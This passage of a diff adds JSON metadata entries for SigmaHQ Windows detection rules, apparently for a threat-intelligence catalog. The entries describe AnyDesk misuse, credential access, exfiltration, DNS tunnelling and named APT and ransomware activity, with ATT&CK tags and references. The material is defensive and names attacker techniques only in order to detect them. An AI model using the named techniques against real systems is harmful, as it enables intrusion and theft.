"proc_creation_win_always_install_elevated_windows_installer.yml", + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", + "level": "medium", + "falsepositive": [ + "System administrator usage", + "Anti virus products" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "uuid": "b52e84a3-029e-4529-b09b-71d19dd27e94", + "value": "Use of Anydesk Remote Access Software", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/02/11", + "filename": "proc_creation_win_anydesk.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects piping the password to an anydesk instance via CMD and the '--set-password' flag", + "uuid": "b1377339-fda6-477a-b455-ac0923f9ec2c", + "value": "AnyDesk Inline Piped Password", + "meta": { + "refs": [ + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk_piped_password_via_cli.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/09/28", + "filename": "proc_creation_win_anydesk_piped_password_via_cli.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Legitimate piping of the password to anydesk", + "Some FP could occure with similar tools that uses the same command line '--set-password'" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.", + "uuid": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", + "value": "AnyDesk Silent Installation", + "meta": { + "refs": [ + "https://twitter.com/TheDFIRReport/status/1423361119926816776?s=20", + "https://support.anydesk.com/Automatic_Deployment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk_silent_install.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2021/08/06", + "filename": "proc_creation_win_anydesk_silent_install.yml", + "author": "J\u00e1n Tren\u010dansk\u00fd", + "level": "high", + "falsepositive": [ + "Legitimate deployment of AnyDesk" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "uuid": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", + "value": "Use of Anydesk Remote Access Software from Suspicious Folder", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk_susp_folder.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/05/20", + "filename": "proc_creation_win_anydesk_susp_folder.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate use of AnyDesk from a non-standard folder" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.", + "uuid": "e1118a8f-82f5-44b3-bb6b-8a284e5df602", + "value": "Scheduled Task WScript VBScript", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_actinium_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053", + "attack.t1053.005" + ], + "creation_date": "2022/02/07", + "filename": "proc_creation_win_apt_actinium_persistence.yml", + "author": "Andreas Hunkeler (@Karneades)", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "This method detects a suspicious PowerShell command line combination as used by APT29 in a campaign against U.S. think tanks.", + "uuid": "033fe7d6-66d1-4240-ac6b-28908009c71f", + "value": "APT29", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/", + "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_apt29_thinktanks.yml" + ], + "tags": [ + "attack.execution", + "attack.g0016", + "attack.t1059.001" + ], + "creation_date": "2018/12/04", + "filename": "proc_creation_win_apt_apt29_thinktanks.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects activity that could be related to Baby Shark malware", + "uuid": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", + "value": "Baby Shark Activity", + "meta": { + "refs": [ + "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_babyshark.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003", + "attack.t1059.001", + "attack.discovery", + "attack.t1012", + "attack.defense_evasion", + "attack.t1218.005" + ], + "creation_date": "2019/02/24", + "filename": "proc_creation_win_apt_babyshark.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", + "uuid": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", + "value": "Judgement Panda Credential Access Activity", + "meta": { + "refs": [ + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_bear_activity_gtr19.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" + ], + "creation_date": "2019/02/21", + "filename": "proc_creation_win_apt_bear_activity_gtr19.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious DLL loading from AppData Local path as described in BlueMashroom report", + "uuid": "bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0", + "value": "BlueMashroom DLL Load", + "meta": { + "refs": [ + "https://www.virusbulletin.com/conference/vb2019/abstracts/apt-cases-exploiting-vulnerabilities-region-specific-software", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_bluemashroom.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.010" + ], + "creation_date": "2019/10/02", + "filename": "proc_creation_win_apt_bluemashroom.yml", + "author": "Florian Roth, Tim Shelton", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018", + "uuid": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", + "value": "Chafer Activity", + "meta": { + "refs": [ + "https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_chafer_mar18.yml" + ], + "tags": [ + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" + ], + "creation_date": "2018/03/23", + "filename": "proc_creation_win_apt_chafer_mar18.yml", + "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects wmiexec vbs version execution by wscript or cscript", + "uuid": "966e4016-627f-44f7-8341-f394905c361f", + "value": "WMIExec VBS Script", + "meta": { + "refs": [ + "https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_cloudhopper.yml" + ], + "tags": [ + "attack.execution", + "attack.g0045", + "attack.t1059.005" + ], + "creation_date": "2017/04/07", + "filename": "proc_creation_win_apt_cloudhopper.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects CrackMapExecWin Activity as Described by NCSC", + "uuid": "04d9079e-3905-4b70-ad37-6bdf11304965", + "value": "CrackMapExecWin", + "meta": { + "refs": [ + "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control", + "https://attack.mitre.org/software/S0488/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_dragonfly.yml" + ], + "tags": [ + "attack.g0035", + "attack.credential_access", + "attack.discovery", + "attack.t1110", + "attack.t1087" + ], + "creation_date": "2018/04/08", + "filename": "proc_creation_win_apt_dragonfly.yml", + "author": "Markus Neis", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Elise backdoor acitivty as used by APT32", + "uuid": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", + "value": "Elise Backdoor", + "meta": { + "refs": [ + "https://community.rsa.com/community/products/netwitness/blog/2018/02/13/lotus-blossom-continues-asean-targeting", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_elise.yml" + ], + "tags": [ + "attack.g0030", + "attack.g0050", + "attack.s0081", + "attack.execution", + "attack.t1059.003" + ], + "creation_date": "2018/01/31", + "filename": "proc_creation_win_apt_elise.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27", + "uuid": "9aa01d62-7667-4d3b-acb8-8cb5103e2014", + "value": "Emissary Panda Malware SLLauncher", + "meta": { + "refs": [ + "https://app.any.run/tasks/579e7587-f09d-4aae-8b07-472833262965", + "https://twitter.com/cyb3rops/status/1168863899531132929", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_emissarypanda_sep19.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ], + "creation_date": "2018/09/03", + "filename": "proc_creation_win_apt_emissarypanda_sep19.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects EmpireMonkey APT reported Activity", + "uuid": "10152a7b-b566-438f-a33c-390b607d1c8d", + "value": "Empire Monkey", + "meta": { + "refs": [ + "https://app.any.run/tasks/a4107649-8cb0-41af-ad75-113152d4d57b", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_empiremonkey.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.010" + ], + "creation_date": "2019/04/02", + "filename": "proc_creation_win_apt_empiremonkey.yml", + "author": "Markus Neis", + "level": "critical", + "falsepositive": [ + "Very Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a specific tool and export used by EquationGroup", + "uuid": "d465d1d8-27a2-4cca-9621-a800f37cf72e", + "value": "Equation Group DLL_U Load", + "meta": { + "refs": [ + "https://github.com/adamcaudill/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type=", + "https://securelist.com/apt-slingshot/84312/", + "https://twitter.com/cyb3rops/status/972186477512839170", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_equationgroup_dll_u_load.yml" + ], + "tags": [ + "attack.g0020", + "attack.defense_evasion", + "attack.t1218.011" + ], + "creation_date": "2019/03/04", + "filename": "proc_creation_win_apt_equationgroup_dll_u_load.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Golden Chickens deployment method as used by Evilnum in report published in July 2020", + "uuid": "8acf3cfa-1e8c-4099-83de-a0c4038e18f0", + "value": "EvilNum Golden Chickens Deployment via OCX Files", + "meta": { + "refs": [ + "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", + "https://app.any.run/tasks/33d37fdf-158d-4930-aa68-813e1d5eb8ba/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_evilnum_jul20.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ], + "creation_date": "2020/07/10", + "filename": "proc_creation_win_apt_evilnum_jul20.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", + "uuid": "18739897-21b1-41da-8ee4-5b786915a676", + "value": "GALLIUM Artefacts", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gallium.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1212", + "attack.command_and_control", + "attack.t1071" + ], + "creation_date": "2020/02/07", + "filename": "proc_creation_win_apt_gallium.yml", + "author": "Tim Burrell", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", + "uuid": "440a56bf-7873-4439-940a-1c8a671073c2", + "value": "GALLIUM Sha1 Artefacts", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gallium_sha1.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1212", + "attack.command_and_control", + "attack.t1071" + ], + "creation_date": "2020/02/07", + "filename": "proc_creation_win_apt_gallium_sha1.yml", + "author": "Tim Burrell", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)", + "uuid": "871b9555-69ca-4993-99d3-35a59f9f3599", + "value": "Suspicious UltraVNC Execution", + "meta": { + "refs": [ + "https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf", + "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gamaredon_ultravnc.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.g0047", + "attack.t1021.005" + ], + "creation_date": "2022/03/04", + "filename": "proc_creation_win_apt_gamaredon_ultravnc.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects tools and process executions as observed in a Greenbug campaign in May 2020", + "uuid": "3711eee4-a808-4849-8a14-faf733da3612", + "value": "Greenbug Campaign Indicators", + "meta": { + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_greenbug_may20.yml" + ], + "tags": [ + "attack.g0049", + "attack.execution", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1105", + "attack.defense_evasion", + "attack.t1036.005" + ], + "creation_date": "2020/05/20", + "filename": "proc_creation_win_apt_greenbug_may20.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers", + "uuid": "bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7", + "value": "Exchange Exploitation Activity", + "meta": { + "refs": [ + "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/", + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3", + "https://twitter.com/GadixCRK/status/1369313704869834753?s=20", + "https://twitter.com/BleepinComputer/status/1372218235949617161", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_hafnium.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546", + "attack.t1053" + ], + "creation_date": "2021/03/09", + "filename": "proc_creation_win_apt_hafnium.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Hurricane Panda Activity", + "uuid": "0eb2107b-a596-422e-b123-b389d5594ed7", + "value": "Hurricane Panda Activity", + "meta": { + "refs": [ + "https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_hurricane_panda.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.g0009", + "attack.t1068" + ], + "creation_date": "2019/03/04", + "filename": "proc_creation_win_apt_hurricane_panda.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Judgement Panda activity as described in Global Threat Report 2019 by Crowdstrike", + "uuid": "03e2746e-2b31-42f1-ab7a-eb39365b2422", + "value": "Judgement Panda Exfil Activity", + "meta": { + "refs": [ + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_judgement_panda_gtr19.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.g0010", + "attack.credential_access", + "attack.t1003.001", + "attack.exfiltration", + "attack.t1560.001" + ], + "creation_date": "2019/02/21", + "filename": "proc_creation_win_apt_judgement_panda_gtr19.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Registry modifications performed by Ke3chang malware in campaigns running in 2019 and 2020", + "uuid": "7b544661-69fc-419f-9a59-82ccc328f205", + "value": "Ke3chang Registry Key Modifications", + "meta": { + "refs": [ + "https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf", + "https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_ke3chang_regadd.yml" + ], + "tags": [ + "attack.g0004", + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2020/06/18", + "filename": "proc_creation_win_apt_ke3chang_regadd.yml", + "author": "Markus Neis, Swisscom", + "level": "critical", + "falsepositive": [ + "Will need to be looked for combinations of those processes" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects different process creation events as described in Malwarebytes's threat report on Lazarus group activity", + "uuid": "4a12fa47-c735-4032-a214-6fab5b120670", + "value": "Lazarus Activity Apr21", + "meta": { + "refs": [ + "https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_activity_apr21.yml" + ], + "tags": [ + "attack.g0032", + "attack.execution", + "attack.t1106" + ], + "creation_date": "2021/04/20", + "filename": "proc_creation_win_apt_lazarus_activity_apr21.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Should not be any false positives" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects different process creation events as described in various threat reports on Lazarus group activity", + "uuid": "24c4d154-05a4-4b99-b57d-9b977472443a", + "value": "Lazarus Activity Dec20", + "meta": { + "refs": [ + "https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/", + "https://www.hvs-consulting.de/lazarus-report/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_activity_dec20.yml" + ], + "tags": [ + "attack.g0032", + "attack.execution", + "attack.t1059" + ], + "creation_date": "2020/12/23", + "filename": "proc_creation_win_apt_lazarus_activity_dec20.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Overlap with legitimate process activity in some cases (especially selection 3 and 4)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects different loaders as described in various threat reports on Lazarus group activity", + "uuid": "7b49c990-4a9a-4e65-ba95-47c9cc448f6e", + "value": "Lazarus Loaders", + "meta": { + "refs": [ + "https://www.hvs-consulting.de/lazarus-report/", + "https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_loader.yml" + ], + "tags": [ + "attack.g0032", + "attack.execution", + "attack.t1059" + ], + "creation_date": "2020/12/23", + "filename": "proc_creation_win_apt_lazarus_loader.yml", + "author": "Florian Roth, wagga", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects executables launched outside their default directories as used by Lazarus Group (Bluenoroff)", + "uuid": "3f7f5b0b-5b16-476c-a85f-ab477f6dd24b", + "value": "Lazarus Session Highjacker", + "meta": { + "refs": [ + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_session_highjack.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.005" + ], + "creation_date": "2020/06/03", + "filename": "proc_creation_win_apt_lazarus_session_highjack.yml", + "author": "Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious command line patterns as seen being used by MERCURY threat actor", + "uuid": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", + "value": "MERCURY Command Line Patterns", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_mercury.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.g0069" + ], + "creation_date": "2022/08/26", + "filename": "proc_creation_win_apt_mercury.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detecting DNS tunnel activity for Muddywater actor", + "uuid": "36222790-0d43-4fe8-86e4-674b27809543", + "value": "DNS Tunnel Technique from MuddyWater", + "meta": { + "refs": [ + "https://www.virustotal.com/gui/file/5ad401c3a568bd87dd13f8a9ddc4e450ece61cd9ce4d1b23f68ce0b1f3c190b7/", + "https://www.vmray.com/analyses/5ad401c3a568/report/overview.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_muddywater_dnstunnel.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.004" + ], + "creation_date": "2020/06/04", + "filename": "proc_creation_win_apt_muddywater_dnstunnel.yml", + "author": "@caliskanfurkan_", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects specific process parameters as used by Mustang Panda droppers", + "uuid": "2d87d610-d760-45ee-a7e6-7a6f2a65de00", + "value": "Mustang Panda Dropper", + "meta": { + "refs": [ + "https://app.any.run/tasks/7ca5661d-a67b-43ec-98c1-dd7a8103c256/", + "https://app.any.run/tasks/b12cccf3-1c22-4e28-9d3e-c7a6062f3914/", + "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_mustangpanda.yml" + ], + "tags": [ + "attack.t1587.001", + "attack.resource_development" + ], + "creation_date": "2019/10/30", + "filename": "proc_creation_win_apt_mustangpanda.yml", + "author": "Florian Roth, oscd.community", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)", + "uuid": "5de632bc-7fbd-4c8a-944a-fce55c59eae5", + "value": "REvil Kaseya Incident Malware Patterns", + "meta": { + "refs": [ + "https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers", + "https://www.joesandbox.com/analysis/443736/0/html", + "https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b", + "https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/", + "https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_revil_kaseya.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059", + "attack.g0115" + ], + "creation_date": "2021/07/03", + "filename": "proc_creation_win_apt_revil_kaseya.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Silence downloader. These commands are hardcoded into the binary.", + "uuid": "170901d1-de11-4de7-bccb-8fa13678d857", + "value": "Silence.Downloader V3", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_silence_downloader_v3.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001", + "attack.discovery", + "attack.t1057", + "attack.t1082", + "attack.t1016", + "attack.t1033", + "attack.g0091" + ], + "creation_date": "2019/11/01", + "filename": "proc_creation_win_apt_silence_downloader_v3.yml", + "author": "Alina Stepchenkova, Roman Rezvukhin, Group-IB, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", + "uuid": "958d81aa-8566-4cea-a565-59ccd4df27b0", + "value": "Defrag Deactivation", + "meta": { + "refs": [ + "https://securelist.com/apt-slingshot/84312/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_slingshot.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.005", + "attack.s0111" + ], + "creation_date": "2019/03/04", + "filename": "proc_creation_win_apt_slingshot.yml", + "author": "Florian Roth, Bartlomiej Czyz (@bczyz1)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Trojan loader activity as used by APT28", + "uuid": "ba778144-5e3d-40cf-8af9-e28fb1df1e20", + "value": "Sofacy Trojan Loader Activity", + "meta": { + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/", + "https://www.reverse.it/sample/e3399d4802f9e6d6d539e3ae57e7ea9a54610a7c4155a6541df8e94d67af086e?environmentId=100", + "https://twitter.com/ClearskySec/status/960924755355369472", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_sofacy.yml" + ], + "tags": [ + "attack.g0007", + "attack.execution", + "attack.t1059.003", + 